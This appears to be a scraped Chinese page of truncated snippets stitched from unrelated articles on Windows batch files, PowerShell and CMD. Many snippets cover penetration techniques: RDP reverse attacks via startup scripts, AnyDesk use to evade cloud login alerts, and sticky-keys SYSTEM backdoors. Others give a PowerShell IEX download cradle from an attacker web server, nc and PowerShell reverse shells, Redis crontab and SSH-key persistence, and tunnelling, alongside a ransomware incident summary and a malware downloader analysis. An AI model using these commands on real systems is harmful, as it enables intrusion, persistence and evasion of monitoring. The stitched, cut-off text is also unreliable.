本节我们就一个问题进行探讨,即如何通过远程桌面服务端反打连接他的客户端。...本节我们就来研究如何通过 RDP 反向攻击的方式针对这种受限网络设备完成渗透测试。 RDP 反向攻击的姿势有不少,本节我们主要针对最简单的一个姿势来进行进行讲解,即通过挂载盘符进行 RDP 反向攻击。...但要注意的是,只有通过远程登陆的用户才可以在远程主机中访问 tsclient,其他在远程主机上本地登录的用户是无论如何也无法访问 tsclient 的。...我们的思路是,在远程主机的启动项中写入一个 .bat 脚本(run.bat),当一个客户端用户通过远程桌面连接到这个远程主机时,在登陆之后会立即执行这个启动项中的 run.bat 脚本。...而攻击者唯一要做的就是在其中一台设备上发起 RDPInception 攻击,然后,只需静静等待管理员发起 RDP 远程桌面连接请求,其余的后续攻击便可由程序自动完成了。
所有免杀和绕过方式都有时效性,一旦被公布被查杀和拦截也正常(早晚的事)。....exe进程,所以就可能会出现由werfaylt.exe弹出的下图报错,所以个人建议在得到Session后迁移至x64进程,并执行taskkill /f /im werfaylt.exe命令将该进程结束掉...为避免触发异地登录提醒,我们可以利用AnyDesk来进行绕过,将AnyDesk.exe和静默安装批处理文件上传至可读写目录中,然后在命令行下执行该批处理文件获取连接ID。...注:如果等待时间过长,一直卡着不动获取不到连接ID时可结束当前命令行,重新进入命令行执行anydesk --get-id命令来获取连接ID。...ID即可连接到目标主机的远程桌面,成功的绕过了阿里云主机的异地登录提醒。
通常,在重新启动到安全模式的计算机上会禁用第三方软件,但这些攻击者显然打算继续不受阻碍地远程访问和控制目标机器。 AVOS弹部队部署工具被存储在备份服务器指定目录下的一个。...攻击者远程运行文件,因此它们永远不会写入目标机器的文件系统。 目前尚不清楚以这种方式设置的机器——AnyDesk 设置为在安全模式下运行——甚至可以由其合法所有者远程管理。...在这种情况下,有一个事件日志条目显示正在执行的 base64 编码的 PowerShell 脚本,结果输出到名为execute.bat的文件中,然后运行该文件,最后将其删除。...在另一个事件日志条目中,有一个端口被设置为目标机器上的代理的记录,这在理论上可以帮助攻击者通过代理计算机路由所有命令来隐藏任何横向移动。...上述命令用于迭代和终止在管理程序上运行的任何虚拟机。目前尚不清楚攻击者如何获得启用 ESX Shell 或访问服务器本身所需的管理员凭据。
,直接编辑其权限都是灰色的,不能修改,有了所有权之后,便可以编辑其权限,这里需要给予自己权限,如下图:之后在window下执行以下命令:cd c:\windows\system32move sethc.exe...,可以直接以System权限执行系统命令、创建管理员用户、登录服务等同时,当我们在权限维持时,如果留下了粘滞键后门,当用户修改密码后,我们在远程连接时可能会出现无法登录的情况,这时候上面这种后门进行权限维持就比较有用了...use post/windows/manage/sticky_keysset SESSION 8exploit之后在目标主机中连续五次shift即可执行SYSTEM权限的命令行,这在RDP远程登录用户密码已被修改的情况下很有用...(放大镜Win + U启动再选择)之后在目标主机上按5次shift即可触发后门代理(中间会有一个弹窗迅速闪过,用于执行命令,笔者也未捕获到)之后在empire中成功反弹后门代理:Powershell粘性键持久性技术是众所周知的...1方式类似,Sticky-Keys项目(https://github.com/HanKooR/Sticky-Keys )提供了一个额外的选项,把系统控制台给用户,该工具的使用较为简单,下载批处理文件之后下目标主机执行即可虽然执行时可能会有一些小错误
在该所有者之前,直接编辑其权限都是灰色的,不能修改,有了所有权之后,便可以编辑其权限,这里需要给予自己权限,如下图: ?...同时,当我们在权限维持时,如果留下了粘滞键后门,当用户修改密码后,我们在远程连接时可能会出现无法登录的情况,这时候上面这种后门进行权限维持就比较有用了: 第一种:创建cmd.exe粘滞键,之后在登录界面按下...之后在目标主机中连续五次shift即可执行SYSTEM权限的命令行,这在RDP远程登录用户密码已被修改的情况下很有用~ ?...之后在目标主机上按5次shift即可触发后门代理(中间会有一个弹窗迅速闪过,用于执行命令,笔者也未捕获到) ? 之后在empire中成功反弹后门代理: ?...批处理文件2 与批处理文件1方式类似,Sticky-Keys项目(https://github.com/HanKooR/Sticky-Keys )提供了一个额外的选项,把系统控制台给用户,该工具的使用较为简单
1、CMD 具体步骤如下: 1-1 创建一个批处理文件 比如:在系统的用户目录创建一个批处理文件 alias.bat 1-2 在批处理文件中,定义别名 使用关键字「 doskey 」定义别名,$*...:如果 Command Processor 不存在,可以在「 Microsoft 项」上右键,创建一个新的项,名称设置为 Command Processor 1-4 重启 CMD 命令窗口并使用 1-...我们只需要使用关键字「 T 」连接多条命令,利用关键字「 * 」作为可变参数即可 比如,下面定义了一个别名,相当于调用了 3 条命令 # 命令1:cd到某个文件夹目录 # 命令2:查看当前目录下所有的文件...open(){ explorer . } 2-3 重启 PowerShell 并使用 为了使编写的 Alias 生效,我们需要重启 PowerShell 后再使用 2-4 参数化 在定义别名时...实战 | 如何用 Python 统计 Jira 数据并可视化 实战 | 如何用 Python 自动化监控文件夹完成服务部署!
在重装系统的时候,一个干净安全可信任的Windows原版系统镜像是必不可少的,不过对于很多人来说,在茫茫的网络资源库里,想找到一个自己想要的东西,却有点困难,搞不好就被盗版 网站骗了,下载了一个流氓的系统镜像...开始激活:以 Windows 专业版为例,运行一个管理员权限的 CMD 窗口或 PowerShell (管理员),执行以下命令 slmgr -upk slmgr -ipk W269N-WFGWX-YVC9B...切换完成打开管理员权限的 CMD 窗口或 PowerShell (管理员) 执行以下命令 #64位软件目录 cd "C:\Program Files\Microsoft Office\Office16"...本文介绍如何使用简单的批处理文件快速解决白图标问题。...:所有文件 点击保存, 找到刚才创建的批处理文件,双击(或点右键打开)此文件 执行此批处理文件时,会闪下屏,重启桌面管理程序,此过程中若有杀毒软件弹出拦截提示,务必同意运行,否则批处理重新图标缓存将失败
作者WeiyiGeek将对Windows BAT批处理编程发布学习系列教程,BAT批处理在进行Windows服务器运维中占有举足轻重的地位,能非常方便帮助我们操作管理Windows,当然在可能有的朋友会说现在在...echo 命令" pause : 运行此句会暂停批处理的执行 温馨提示: 运行此命令时会在屏幕上显示Press any key to continue...的提示,等待用户按任意键后继续 示例1:未加...rem echo 我是注释不执行1 :: echo 我是注释不执行2 == echo 我不是注释要执行 @pause call :调用另一个批处理文件 描述: 使用call命令调用其他批处理文件,如果不用...call而直接调用别的批处理文件,那么执行完那个批处理文件后将无法返回当前文件并执行当前文件的后续命令,温馨提示:同一目录可以不加路径。...,在批处理中允许以“:XXX”来构建一个标号,然后用GOTO :标号直接来执行标号后,标号用“:字符串”来定义,标号所在行不被执行。
虽然现代操作系统提供了许多图形化界面和工具,但命令提示符在某些场景下仍然具有重要的作用。在本篇博客中,我们将深入了解命令提示符,介绍其功能和常用命令,以及如何充分利用它来完成各种任务。...通过输入和执行命令,你可以在 CMD 窗口中完成各种操作,如文件管理、系统配置、网络命令、进程管理等。...ftp:启动 FTP 客户端,用于与远程 FTP 服务器进行文件传输。 telnet:启动 Telnet 客户端,用于与远程主机建立 Telnet 连接。...然后,通过在 CMD 窗口中执行该批处理文件,可以自动执行其中的命令和操作。...它提供了丰富的命令、脚本和功能,使系统管理员能够更高效地管理和配置Windows环境。除了PowerShell,还有一些其他替代品,提供了类似的功能和目的。
Cmd与powerShell的几个区别: #速度cmd是打开真的快啊,powershell得等待一段时间才能打开。...#cmd所有的windows系统中都带有cmd,但是powershell就低版本的系统中就没有了,需要自己安装才可以。...不过powershell不仅可以在windows系统中运行,还可以再linux系统和MACOS上运行。...理论上讲powershell是比cmd更强大的语言,同时Powershell会兼容cmd的,但为啥powershell不行不是这个文章的重点,重点是如何能把这个.bat文件在FTVIEW中让他执行起来。...然后一路根据提示点到最后就可以创建包完成。 最后可以在自己指定的存放的地方得到一个有微软公司生成的一个可执行的exe文件。 最后再通过SE中的选择命令去选择生成的可执行文件。
在服务器上以管理员权限运行启用PowerShell远程访问(配置计算机以在没有确认提示的情况下接收远程命令) Enable-PSRemoting -Force Enable-PSRemoting -SkipNetworkProfileCheck...192.168.1.254 # 3.在客户端机器上(需要远程连接被管理的机器上)运行以下命令以接受被管理的机器是受信任的 (如果想管理任何机器请设置为*), 运行以下命令必须是管理员权限 PS >...描述: 从Windows PowerShell 3.0开始,您可以等待重新启动完成,然后再运行下一个命令。指定等待超时和查询间隔,并等待重新启动的计算机上的特定服务可用。...For 参数 : 指定PowerShell可以在远程计算机上运行命令。 Timeout 参数 : 指定五分钟的等待时间。 Delay 参数 : 每两秒钟查询一次远程计算机,以确定它是否重新启动。...Wait-Process 命令 - 使在本地计算机或远程计算机上运行的进程等待 Debug-Process 命令 - 调试本地计算机上运行的一个或多个进程。
脚本执行后,会通过下载服务器下载下一阶段的攻击载荷,攻击者将下载服务器部署在基于 Azure 的 Windows 服务器或基于 AWS 的 EC2 实例上。...第一层 第一层去混淆由 ejv()完成,该函数将混淆数据的每个字符保存在数组中,执行算术运算进行解密。...Batch Downloader 脚本中包含一个混淆命令,用以执行 PowerShell 下载攻击载荷,本例中通过 Azure Cloud 上的服务器 13.78.209.105进行下载。...△ Batch Downloader 示例 VBS Downloader 脚本通过 PowerShell 命令连接到服务器,服务器部署在 AWS EC2 上的 52.27.15.250。...△ VBScript Downloader 示例 PowerShell Dropper 在 Azure 的服务器上发现了一个使用 HCrypt 构建的 PowerShell 脚本。
ipconfig /release:释放ip ipconfig /renew:重新获得ip systeminfo:查看系统信息,主要用来检测是否安装了补丁 arp -a:显示ARP缓存的命令,它可以显示电脑上所有的...ARP协议是将IP地址映射为MAC地址的协议,其在协议上使用ARP请求及ARP应答报文来实现。 net view:查看局域网内其他计算机名称 telnet:连接远程终端。...批处理文件是DOS命令的组合文件,写在批处理文件的命令会被逐一执行,后缀名为“.bat”。比如创建一个批处理文件“x.bat”,包含3条DOS命令。 DIR查看已经已经创建成功。...本地C盘的批处理文件“x.bat”如果被执行或加载到自启动项,则会执行该命令。 可以看到,创建的管理员用户“cr”已经存在,后续会执行关机。...---- 三.Powershell Powershell在安全领域也是非常重要的技能,推荐大家阅读作者两篇前文。
) Windows中加载并执行PowerShell脚本 本地加载并执行PowerShell脚本 远程下载并执行PowerShell脚本 Windows中的批处理文件 Windows中快捷键操作 Windows...更多的关于PowerShell的用法:PowerShell使用浅析 本地加载并执行PowerShell脚本 在cmd当前目录下有PowerView.ps1脚本,并执行其中的Get-Netdomain模块...\powerview.ps1;Get-NetDomain 远程下载并执行PowerShell脚本 远程下载并执行test.ps1脚本、远程下载PowerView.ps1脚本,并执行其中的Get-Netdomain...\powerview.ps1;Get-NetDomain Windows中的批处理文件 @echo off 表示在此语句后所有运行的命令都不显示命令行本身 echo...,系统也会重新启动该进程 system:该进程是windows页面内存管理进程,它能够确保系统的正常启动 system idle process:该进行的功能是在CPU空闲时发出一个命令,使CPU挂起,
敲下打包命令 等待构建结束,并将资源文件压缩成压缩包复制到桌面 链接部署服务器 找到需要部署的站点文件夹 粘贴至目标文件夹并解压 在项目多的时候,重复操作极大的浪费时间。...在远程机器添加批处理文件 当配置的目标机器为windows系统时,文件会被送到配置远程链接的账户所属用户文件夹下。在传输完毕后,预留的 superDeploy.bat 文件会被执行。...Jenkins就会按照SVN地址拉取代码,并且执行构建命令,在构建完成后将dist文件夹压缩成压缩包,送到目标服务器并且执行预留在目标服务器的批处理文件。...批处理文件将压缩包移动到执行的目标目录,处理解压缩的动作。一个自动构建和部署的过程就完成了。 实际构建时间需要40秒~70秒,但对于手工操作来说要强太多了。...windows与svn总有大量奇奇怪怪的问题,在搭建的过程频频受阻。好不容易搭建好了,依赖却安装不了了,障碍一个接一个。 在连续失败了95次之后,第96次终于成功将所有的流程走通。
将生成的test文件复制到python搭建的web服务器中,于是有:http://192.168.1.18:9889/test step 3:在目标机上执行powershell下载脚本 powershell...在目标机上启动一个进程进行DLL注入,可以后续的注入更加隐蔽,使用如下的命令新建一个名为notepad.exe的隐蔽进程: Start-Process c:\windows\system32\notepad.exe...执行run之后,会看到生成的powershell命令,复制出来,在目标机上执行 powershell.exe -nop -w hidden -c $h=new-object net.webclient;...(2)SSH远程转发 ? 2、 EarthWorm端口转发 EW是一套便携式的网络穿透工具,具有SOCKS v5服务架设和端口转发两大核心功能,可在复杂网络环境下完成网络穿透。.../ew -s ssocksd -l 1080 反弹 SOCKS v5 服务器 这个操作具体分两步: a) 先在一台具有公网 ip 的主机A上运行以下命令: $ .
背景资料 偶然发现在我的测试中使用PowerShell远程处理作为维护系统远程代码执行的主要方法很有用。它是一个内置的Windows功能。...幸运的是,Redditors找到了在Centos上使用PowerShell进行NTLM身份验证的方法,因此我将他们的发现整合到一个简单的PowerShell Docker镜像quickbreach /...如何使用从Linux到Windows的PowerShell远程处理 本节将逐步介绍如何从Linux客户端到Windows目标建立远程PowerShell会话。...要完成此操作,请运行以下命令之一:使用通配符允许所有计算机在对此主机进行身份验证时使用NTLM Set-Item WSMan:localhostClientTrustedHosts -Force -Value.../powershell-ntlm 6.现在我们一直在等待:使用以下命令进入远程PowerShell会话 - 请注意,您必须指定-Authentication类型: # Grab the creds we
.利用计划任务执行命令反弹shell 在redis以root权限运行时可以写crontab来执行命令反弹shell 先在自己的服务器上监听一个端口 nc -lvnp 7999 然后执行命令: root@...1.4.1 写ssh-keygen公钥然后使用私钥登录 利用条件: Redis服务使用ROOT账号启动 服务器开放了SSH服务,而且允许使用密钥登录,即可远程写入一个公钥,直接登录远程服务器 操作流程:...,实际上是一个powershell的函数,使用方法类似Netcat。.../Shells/Invoke-PowerShellUdp.ps1');Invoke-PowerShellUdp -Reverse -IPAddress 192.168.1.4 -port 5399 在攻击者的电脑上执行如下的命令...python搭建的web服务器中,于是有:http://192.168.1.18:9889/test step 3:在目标机上执行powershell下载脚本 powershell IEX (New-Object
但是一些比较底层的命令执行来说,可能你需要一些其他的工具,这个就是和我们远程到 Linux 上主机的意思是一样的。...简单来说 WinRM 是使用 HTTP 协议的,协议的端口是:5985。 我们可以通过 WinRM 来在 powershell 上到远程计算机上执行相关命令。...可以理解为,就是远程计算机为你开放了一个 powershell 的执行环境。这个权限还是非常大的。...从上面的图片上我们可以看到,我们已经登录到一个另一个计算机中的环境中,并在本地计算机上使用 powershell 在远程计算机上执行命令。...上面的命令需要在服务器和客户端上分别都执行,等于是所有机器都要执行,不管是主动连接的还是被连接的。
在 Windows 10 上,批处理文件是一种特殊的文本文件,通常具有。Bat 扩展,它包含一个或多个命令,命令提示符可以理解并依次运行以执行各种操作。...你还可以使用 PowerShell 等其他工具编写更高级的脚本。然而,当你需要运行命令来改变设置、自动化例程、启动应用程序或启动网站时,使用带有命令提示符的批处理文件是一个方便的选择。...如何在 Windows 10上创建批处理文件 创建批处理(脚本或批处理脚本)文件的过程很简单。你只需要一个文本编辑器和一些基本的命令行知识。...(您可以在不使用“@”的情况下使用该命令,但是符号隐藏了正在执行的命令以创建一个更清晰的返回。) ECHO:在屏幕上打印任意文本。 PAUSE:在执行命令后保持窗口打开。...如何在 Windows 10 上运行批处理文件 在 Windows 10 上,你至少可以用三种方式运行批处理文件。你可以使用文件资源管理器或命令提示符按需运行它。
领取专属 10元无门槛券
手把手带您无忧上云